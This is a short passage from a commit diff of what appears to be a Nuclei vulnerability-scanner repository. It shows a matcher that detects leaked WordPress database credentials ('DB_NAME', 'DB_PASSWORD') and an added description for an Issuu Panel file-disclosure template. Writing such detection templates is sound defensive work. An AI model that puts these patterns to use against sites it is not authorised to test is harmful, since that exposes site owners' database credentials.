matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200

1
vulnerabilities/wordpress/issuu-panel-lfi.yaml
View File

@ -4,6 +4,7 @@ info:
name: Wordpress Plugin Issuu Panel - RFI & LFI
author: 0x_Akoko
severity: high
description: The WordPress Issuu Plugin includes an arbitrary file disclosure vulnerability that allows unauthenticated attackers to disclose the content of local and remote files.
reference: https://cxsecurity.com/issue/WLB-2016030131
tags: wp-plugin,wordpress,lfi,rfi